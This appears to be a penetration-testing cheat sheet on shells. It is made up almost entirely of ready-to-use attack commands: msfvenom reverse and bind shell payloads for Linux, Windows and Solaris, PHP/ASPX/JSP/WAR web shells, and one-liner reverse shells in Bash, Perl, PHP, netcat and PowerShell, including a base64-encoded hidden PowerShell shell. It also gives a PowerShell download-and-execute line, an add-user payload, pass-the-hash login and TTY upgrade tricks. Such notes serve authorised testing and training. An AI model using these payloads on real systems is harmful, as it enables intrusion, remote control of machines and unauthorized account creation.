Shells

Listener

rlwrap -cAr nc -lnvp <Port Number>

Web Shells

Locate and upload appropriate shells from - /user/share/webshells


Reverse Shells

Refer to https://www.revshells.com/


Reverse Shells (MSFvenom)

NOTE:

  • shell/reverse_tcp = staged payload

  • shell_reverse_tcp = unstaged payload

  • staged payload requires meterpreter listener

Formats
Framework Executable Formats [--format <value>]
===============================================

    Name
    ----
    asp
    aspx
    aspx-exe
    axis2
    dll
    ducky-script-psh
    elf
    elf-so
    exe
    exe-only
    exe-service
    exe-small
    hta-psh
    jar
    jsp
    loop-vbs
    macho
    msi
    msi-nouac
    osx-app
    psh
    psh-cmd
    psh-net
    psh-reflection
    python-reflection
    vba
    vba-exe
    vba-psh
    vbs
    war

Framework Transform Formats [--format <value>]
==============================================

    Name
    ----
    base32
    base64
    bash
    c
    csharp
    dw
    dword
    go
    golang
    hex
    java
    js_be
    js_le
    masm
    nim
    nimlang
    num
    octal
    perl
    pl
    powershell
    ps1
    py
    python
    raw
    rb
    ruby
    rust
    rustlang
    sh
    vbapplication
    vbscript
    zig

Linux

Reverse Shell
  • 32-bit Systems

msfvenom -p linux/x86/shell/reverse_tcp LHOST=<Kali IP Address> LPORT=<Kali Port> -f <Format> > <File Name>
msfvenom -p linux/x86/shell_reverse_tcp LHOST=<Kali IP Address> LPORT=<Kali Port> -f <Format> > <File Name>
  • 64-bit Systems

msfvenom -p linux/x64/shell/reverse_tcp LHOST=<Kali IP Address> LPORT=<Kali Port> -f <Format> > <File Name>
msfvenom -p linux/x64/shell_reverse_tcp LHOST=<Kali IP Address> LPORT=<Kali Port> -f <Format> > <File Name>
Bind Shell
  • 32-bit Systems

msfvenom -p linux/x86/meterpreter/bind_tcp RHOST=<Target IP Address> LPORT=<Target Port> -f <Format> > <File Name>
msfvenom -p linux/x86/shell/bind_tcp RHOST=<Target IP Address> LPORT=<Target Port> -f <Format> > <File Name>
msfvenom -p linux/x86/shell_bind_tcp RHOST=<Target IP Address> LPORT=<Target Port> -f <Format> > <File Name>
  • 64-bit Systems

msfvenom -p linux/x64/meterpreter/bind_tcp RHOST=<Target IP Address> LPORT=<Target Port> -f <Format> > <File Name>
msfvenom -p linux/x64/shell/bind_tcp RHOST=<Target IP Address> LPORT=<Target Port> -f <Format> > <File Name>
msfvenom -p linux/x64/shell_bind_tcp RHOST=<Target IP Address> LPORT=<Target Port> -f <Format> > <File Name>

Windows

Reverse Shell
  • 32-bit Systems

msfvenom -p windows/shell/reverse_tcp LHOST=<Kali IP Address> LPORT=<Kali Port> -f <Format> > <File Name>
msfvenom -p windows/shell_reverse_tcp LHOST=<Kali IP Address> LPORT=<Kali Port> -f <Format> > <File Name>
  • 64-bit Systems

msfvenom -p windows/x64/shell/reverse_tcp LHOST=<Kali IP Address> LPORT=<Kali Port> -f <Format> > <File Name>
msfvenom -p windows/x64/shell_reverse_tcp LHOST=<Kali IP Address> LPORT=<Kali Port> -f <Format> > <File Name>
Bind Shell
  • 32-bit Systems

msfvenom -p windows/meterpreter/bind_tcp RHOST=<Target IP Address> LPORT=<Target Port> -f <Format> > <File Name>
msfvenom -p windows/meterpreter_bind_tcp RHOST=<Target IP Address> LPORT=<Target Port> -f <Format> > <File Name>
msfvenom -p windows/shell/bind_tcp RHOST=<Target IP Address> LPORT=<Target Port> -f <Format> > <File Name>
msfvenom -p windows/shell_bind_tcp RHOST=<Target IP Address> LPORT=<Target Port> -f <Format> > <File Name>
  • 64-bit Systems

msfvenom -p windows/x64/meterpreter/bind_tcp RHOST=<Target IP Address> LPORT=<Target Port> -f <Format> > <File Name>
msfvenom -p windows/x64/meterpreter_bind_tcp RHOST=<Target IP Address> LPORT=<Target Port> -f <Format> > <File Name>
msfvenom -p windows/x64/shell/bind_tcp RHOST=<Target IP Address> LPORT=<Target Port> -f <Format> > <File Name>
msfvenom -p windows/x64/shell_bind_tcp RHOST=<Target IP Address> LPORT=<Target Port> -f <Format> > <File Name>
Extras
  • Run command via executable file

msfvenom -a [ x86 | x64 ] --platform Windows -p windows/exec CMD="<Powershell | CMD Command>" -f exe > payload.exe

EXAMPLE:

msfvenom -a x86 --platform Windows -p windows/exec CMD="powershell "IEX(New-Object Net.webClient).downloadString('http:///')"" -f exe > payload.exe

  • Create User via executable file

msfvenom -p windows/adduser USER=<Username> PASS=<Password> -f exe > adduser.exe

SunOS (Solaris)

msfvenom --platform=solaris --payload=solaris/x86/shell_reverse_tcp LHOST=<Kali IP Address> LPORT=<Kali Port> -f elf -e x86/shikata_ga_nai -b '\x00' > solshell.elf

Web-based Payloads

PHP

Web Shell
<?php system($_GET['cmd']); ?>
<?php system($_REQUEST['cmd']); ?>
Reverse Shell
<?php system('nc.exe -e cmd.exe <Kali IP Address> <Kali Port>') ?>
msfvenom -p php/meterpreter_reverse_tcp LHOST=<Kali IP Address> LPORT=<Kali Port> -f raw > shell.php
cat shell.php | pbcopy && echo '<?php ' | tr -d '\n' > shell.php && pbpaste >> shell.php

ASP[X]

Web Shell

Get from the following

  • /usr/share/webshells/aspx/cmdasp.aspx

  • /usr/share/webshells/aspx/shell.aspx

NOTE: Remember to modify variables, string host and int port in shell.aspx

Reverse Shell
msfvenom -p windows/meterpreter/reverse_tcp LHOST=<Kali IP Address> LPORT=<Kali Port> -f asp > reverse.asp
msfvenom -p windows/meterpreter/reverse_tcp LHOST=<Kali IP Address> LPORT=<Kali Port> -f aspx > reverse.aspx

JSP

msfvenom -p java/jsp_shell_reverse_tcp LHOST=<Kali IP Address> LPORT=<Kali Port> -f raw> reverse.jsp

WAR

msfvenom -p java/jsp_shell_reverse_tcp LHOST=<Kali IP Address> LPORT=<Kali Port> -f war > reverse.war

NodeJS

msfvenom -p nodejs/shell_reverse_tcp LHOST=<Kali IP Address> LPORT=<Kali Port>

Script Language Payloads

Evil-WinRM

NOTE:

  • Verify usability with: crackmapexec winrm <Target IP>

  • Look for port 5985 in nmap scans

evil-winrm -i <Target IP Address> -u <Username> -p <Password>
evil-winrm -i <Target IP Address> -u <Username -H <NTLM Hash>

Powercat.ps1

powershell -nop -w hidden IEX(New-Object System.Net.WebClient).DownloadString('http://<Kali IP Address>/powercat.ps1')
powercat -c <Kali IP Address> -p <Kali Port> -e powershell

Perl

msfvenom -p cmd/unix/reverse_perl LHOST=<Kali IP Address> LPORT=<Kali Port> -f raw > reverse.pl
perl -MIO -e '$p=fork;exit,if($p);$c=new IO::Socket::INET(PeerAddr,"<Kali IP Address>:<Kali Port>");STDIN->fdopen($c,r);$~->fdopen($c,w);system$_ while<>;'

Python

msfvenom -p cmd/unix/reverse_python LHOST=<Kali IP Address> LPORT=<Kali Port> -f raw > reverse.py

PHP

<?php system('nc.exe -e cmd.exe <Kali IP Address> <Kali Port>') ?>
php -r '$sock=fsockopen("<Kali IP Address>",<Kali Port>);exec("/bin/sh -i <&3 >&3 2>&3");'

Bash

NOTE: Create a .sh file and paste the following

#!/bin/bash
/bin/bash -c "bash -i >& /dev/tcp/<Kali IP Address>/<Kali Port> 0>&1"

Netcat

  • Linux

nc -nv <Kali IP Address> <Kali Port> -e /bin/bash
nc -nv <Kali IP Address> <Kali Port> -e /bin/sh
nc -nv <Kali IP Address> <Kali Port> -c /bin/bash
nc -nv <Kali IP Address> <Kali Port> -c /bin/sh
  • Windows

nc64.exe <Kali IP Address> <Kali Port> -e cmd
nc64.exe <Kali IP Address> <Kali Port> -e powershell
nc64.exe <Kali IP Address> <Kali Port> -t -e cmd
nc64.exe <Kali IP Address> <Kali Port> -t -e powershell

PowerShell

Do the following in Kali's pwsh

$Text = '$client = New-Object System.Net.Sockets.TCPClient("<Kali IP Address>", <Kali Port>);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + "PS " + (pwd).Path + "> ";$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()'
$Bytes = [System.Text.Encoding]::Unicode.GetBytes($Text)
$EncodedText =[Convert]::ToBase64String($Bytes)
$EncodedText

Create the following python script and run it

import sys
import base64

payload = '$client = New-Object System.Net.Sockets.TCPClient("<Kali IP Address>",<Kali Port>);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + "PS " + (pwd).Path + "> ";$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()'

cmd = "powershell -nop -w hidden -e " + base64.b64encode(payload.encode('utf16')[2:]).decode()

print(cmd)

TTY Shell

NOTE: Sometime we get a reverse shell and it may not be fully functional. The following commands allow us to spawn proper shell.

Python

python -c 'import pty; pty.spawn("/bin/sh")'
python3 -c 'import pty;pty.spawn("/bin/bash")'; export TERM=xterm-256color

Bash

echo os.system('/bin/bash')
/bin/sh -i
/bin/bash -i
script -qc /bin/bash /dev/null

Perl

perl -e 'exec "/bin/sh";'
exec "/bin/sh";

Ruby

exec "/bin/sh"

Lua

os.execute('/bin/sh')

IRB

exec "/bin/sh"

Vi

:!bash
:set shell=/bin/bash:shell

Nmap:

!sh

Last updated